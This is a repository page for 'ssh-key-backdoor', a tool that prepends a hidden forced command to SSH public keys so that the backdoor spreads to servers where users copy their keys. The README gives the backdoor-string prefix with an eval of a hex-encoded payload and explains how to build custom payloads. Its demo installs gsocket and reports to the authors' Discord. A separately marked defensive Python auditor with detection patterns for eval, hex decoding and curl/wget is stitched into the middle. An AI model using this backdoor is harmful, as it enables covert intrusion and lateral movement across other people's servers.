• Stars: 328
• Rank: 128,352 (Top 3%)
• Language: Shell
• Created over 1 year ago
• Updated over 1 year ago


Repository Details

ssh-key-backdoor

This program generates a backdoor to hide inside an SSH public key (e.g. id_rsa.pub or authorized_keys). The backdoor will execute once when the user next logs in.


The objective is to use the ssh public key to move laterally within a target network. It exploits the fact that users copy their public ssh key to other servers without checking the content. Any server where their public key is copied will automatically get backdoored.


See https://blog.thc.org/infecting-ssh-public-keys-with-backdoors for details

Simply add the following backdoor-string to the beginning of the public key (id_rsa.pub or authorized_keys; everything up until, but not including, the ssh-ed25519 AAA... part):

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo <hex-encoded payload omitted>|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....
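Because the prefix is parsed by sshd with the same grammar as any other authorized_keys entry ([options] keytype base64-key [comment]), a defender can audit key files for it. The following is an added example, not code from the ssh-key-backdoor project: a small Python parser for that format which flags lines carrying a forced command= option and, inside the command, constructs such as eval, xxd -r, base64 -d or command substitution that a legitimately restricted key (an rrsync wrapper, say) does not normally need. The sample key lines, the ###---MARKER--- string and the hex payload are constructed placeholders, not the page's real backdoor-string.

```python
"""Audit authorized_keys / id_*.pub lines for option-prefixed entries.

Format (what sshd parses): [options] keytype base64-key [comment]
Options are comma-separated, and a quoted value such as command="..."
may contain commas, spaces and escaped quotes, so naive splitting fails.
Added example, not part of the ssh-key-backdoor project.
"""
import re
from dataclasses import dataclass, field

KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}

# Constructs a restricted deploy/backup command rarely needs but an
# obfuscated forced command relies on (decode, then execute).
SUSPICIOUS = [
    (r"\beval\b", "eval of dynamic content"),
    (r"\bxxd\s+-r", "hex decoding (xxd -r)"),
    (r"\bbase64\s+(-d|--decode)", "base64 decoding"),
    (r"\$\(|`", "command substitution"),
    (r"\b(curl|wget)\b", "network download"),
]


@dataclass
class Entry:
    options: list
    key_type: str
    key: str
    comment: str
    findings: list = field(default_factory=list)


def split_outside_quotes(text, is_sep):
    """Split text at characters satisfying is_sep, ignoring separators
    inside double quotes; a backslash inside quotes escapes the next char."""
    parts, cur, in_quote, i = [], [], False, 0
    while i < len(text):
        c = text[i]
        if in_quote and c == "\\" and i + 1 < len(text):
            cur.append(text[i:i + 2])
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif not in_quote and is_sep(c):
            if cur:
                parts.append("".join(cur))
                cur = []
            i += 1
            continue
        cur.append(c)
        i += 1
    if cur:
        parts.append("".join(cur))
    return parts


def parse_line(line):
    """Parse one key line; returns None for blank lines and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = split_outside_quotes(line, str.isspace)
    if tokens[0] in KEY_TYPES:          # no options field at all
        options, rest = [], tokens
    else:                               # first token is the options field
        options = split_outside_quotes(tokens[0], lambda c: c == ",")
        rest = tokens[1:]
    if len(rest) < 2 or rest[0] not in KEY_TYPES:
        raise ValueError("unrecognised key line: %r" % line[:40])
    entry = Entry(options, rest[0], rest[1], " ".join(rest[2:]))
    for opt in options:
        if opt.startswith("command="):
            entry.findings.append("forced command present")
            cmd = opt[len("command="):].strip('"')
            entry.findings += [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]
    return entry


def audit(text):
    """Parse every key line of an authorized_keys-style text into Entries."""
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


# Constructed sample file: placeholder key material and a placeholder hex
# payload (41424344 = "ABCD"), not the page's real backdoor-string.
SAMPLE_AUTHORIZED_KEYS = """
# constructed sample, not real keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERkeymaterial alice@laptop
command="/usr/bin/rrsync /srv/backup",no-pty,no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDERkeymaterial backup@nas
no-user-rc,no-X11-forwarding,command="`###---MARKER---`;eval $(echo 41424344|xxd -r -ps);" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERkeymaterial bob@laptop
"""

if __name__ == "__main__":
    for e in audit(SAMPLE_AUTHORIZED_KEYS):
        print(f"{e.key_type:12} {e.comment:14} {'; '.join(e.findings) or 'nothing flagged'}")
```

Run it over ~/.ssh/authorized_keys on every host where a public key has been copied. An entry whose only finding is "forced command present" is what a deliberately restricted backup or deploy key looks like; the decoder and eval findings are the signature of the trick described above. The same check surfaces canary-style command= entries, which is the point: any forced command on a key the owner did not consciously restrict deserves a look.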

This DEMO backdoor-string installs https://www.gsocket.io/deploy and reports the success back to our Discord channel.

Think of the ssh public key as a sort of ~/.bashrc but with your backdoor inside, that gets propagated by the user to various servers, and when triggered sends a secret login code back to us.

Create your own backdoor-string by editing ssh-key-backdoor.sh (between ---BEGIN BACKDOOR--- and ---END BACKDOOR---) and execute:

# Set your own discord key or the results will be reported to our Discord channel. Please.
$ export KEY="1246565073951234567/mEDRabcdefghijklnopqrstuvwxzyABCDEahagasdKr7YQmA0Ej1-Ibdaytta_XGGq-n"
$ ./ssh-key-backdoor.sh

# Or view the clear commands without hex-encoding
$ ./ssh-key-backdoor.sh clear

(The same command= trick can be used to trigger a canary or start other hidden services.)


This goes deep down the Bash rabbit hole; the curious reader may like to read our blog.
